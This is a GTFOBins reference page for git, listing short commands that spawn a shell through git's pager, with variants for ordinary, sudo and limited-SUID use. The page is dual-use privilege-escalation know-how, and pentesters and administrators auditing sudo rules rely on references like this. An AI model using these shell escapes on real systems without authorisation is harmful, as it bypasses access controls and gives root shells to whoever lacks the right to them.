GTFOBins.github.io/_gtfobins/git.md
2019-06-23 17:24:38 +02:00

668 B

functions
shell sudo limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method. sudo git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help